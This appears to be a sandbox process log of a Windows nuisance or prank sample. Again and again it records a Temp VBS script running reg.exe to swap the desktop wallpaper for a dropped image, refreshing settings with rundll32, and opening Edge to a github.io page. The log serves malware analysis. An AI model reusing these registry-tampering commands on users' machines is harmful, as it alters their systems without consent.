C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xb8,0x10c,0x7ffaa8c23cb8,0x7ffaa8c23cc8,0x7ffaa8c23cd8

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2024,8284217200643416704,8375321515086948853,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2032 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2024,8284217200643416704,8375321515086948853,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2080 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2024,8284217200643416704,8375321515086948853,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2828 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,8284217200643416704,8375321515086948853,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3212 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,8284217200643416704,8375321515086948853,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3220 /prefetch:1

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffaa8c23cb8,0x7ffaa8c23cc8,0x7ffaa8c23cd8

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,8284217200643416704,8375321515086948853,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4456 /prefetch:1

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffaa8c23cb8,0x7ffaa8c23cc8,0x7ffaa8c23cd8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,8284217200643416704,8375321515086948853,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5128 /prefetch:1

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffaa8c23cb8,0x7ffaa8c23cc8,0x7ffaa8c23cd8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,8284217200643416704,8375321515086948853,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5356 /prefetch:1

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffaa8c23cb8,0x7ffaa8c23cc8,0x7ffaa8c23cd8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,8284217200643416704,8375321515086948853,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5568 /prefetch:1

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffaa8c23cb8,0x7ffaa8c23cc8,0x7ffaa8c23cd8

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,8284217200643416704,8375321515086948853,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5180 /prefetch:1

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

